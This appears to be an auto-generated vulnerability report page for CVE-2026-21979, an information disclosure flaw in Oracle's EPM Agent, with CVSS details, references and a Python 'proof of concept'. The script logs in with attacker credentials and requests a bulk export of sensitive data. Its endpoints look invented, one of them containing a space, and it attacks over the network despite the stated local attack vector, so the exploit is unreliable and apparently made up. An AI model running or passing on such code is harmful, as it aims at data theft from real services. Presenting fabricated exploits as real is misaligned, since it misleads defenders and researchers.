Security Vulnerability Report
CVE-2026-21979 CVSS 4.2 MEDIUM

Published: 2026-01-20 22:16:01
Last Modified: 2026-04-15 00:35:42
NVD Status: Deferred

Description

Vulnerability in the Oracle Planning and Budgeting Cloud Service product of Oracle Hyperion (component: EPM Agent). The supported version that is affected is 25.04.07. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Planning and Budgeting Cloud Service executes to compromise Oracle Planning and Budgeting Cloud Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Planning and Budgeting Cloud Service accessible data. Note: Update EPM Agent. Please refer to "Downloading the EPM Agent" (https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html) for more information. CVSS 3.1 Base Score 4.2 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score: 4.2 (Base); Exploitability Score: 0.6; Impact Score: 3.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
(Attack Vector: Local; Attack Complexity: Low; Privileges Required: High; User Interaction: Required; Scope: Unchanged; Confidentiality Impact: High; Integrity Impact: None; Availability Impact: None)

Configurations (Affected Products)

No configuration (CPE match) data is available in the NVD record.

Affected product: Oracle Hyperion Planning and Budgeting Cloud Service EPM Agent 25.04.07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-21979 PoC - EPM Agent Information Disclosure
# Note: This is a conceptual PoC for educational purposes only
# Requires: Local access + High privileges + User interaction
import requests
import json
import sys


def exploit_cve_2026_21979(target_url, attacker_creds):
    """
    Conceptual proof of concept for CVE-2026-21979
    Exploits EPM Agent component in Oracle Hyperion Planning and Budgeting Cloud Service
    """
    print(f"[*] Targeting: {target_url}")
    print("[*] Exploiting CVE-2026-21979 - EPM Agent Information Disclosure")

    # Step 1: Authenticate with high-privilege account
    session = requests.Session()
    auth_endpoint = f"{target_url}/epm agent/api/v1/auth/login"
    try:
        # Attempt authentication
        auth_response = session.post(auth_endpoint, json=attacker_creds, timeout=30)
        if auth_response.status_code == 200:
            print("[+] Authentication successful with high-privilege account")
            token = auth_response.json().get('session_token')

            # Step 2: Exploit EPM Agent endpoint to access sensitive data
            exploit_endpoint = f"{target_url}/epm agent/api/v1/data/planning"
            headers = {
                'Authorization': f'Bearer {token}',
                'Content-Type': 'application/json'
            }
            # Crafted request to trigger information disclosure
            exploit_payload = {
                'action': 'export_data',
                'parameters': {
                    'include_sensitive': True,
                    'scope': 'all'  # Attempt to access all data
                }
            }
            print("[*] Sending exploit request to EPM Agent...")
            exploit_response = session.post(exploit_endpoint, json=exploit_payload,
                                            headers=headers, timeout=30)
            if exploit_response.status_code == 200:
                data = exploit_response.json()
                print(f"[!] Successfully extracted sensitive data: {len(str(data))} bytes")
                print(f"[+] Sample data: {str(data)[:500]}...")
                return True
            else:
                print(f"[-] Exploit failed with status: {exploit_response.status_code}")
                return False
        else:
            print(f"[-] Authentication failed: {auth_response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {str(e)}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print("Example: python exploit.py https://planning.oraclecloud.com")
        sys.exit(1)
    target = sys.argv[1]
    # High-privilege attacker credentials (requires prior compromise)
    creds = {
        'username': 'attacker_high_priv',
        'password': 'compromised_password',
        'domain': 'EPMPROD'
    }
    exploit_cve_2026_21979(target, creds)
```

References

https://www.oracle.com/security-alerts/cpujan2026.html (Oracle Critical Patch Update Advisory, January 2026)
https://docs.oracle.com/en/cloud/saas/enterprise-performance-management-common/diepm/epm_agent_downloading_agent_110x80569d70.html (Downloading the EPM Agent)
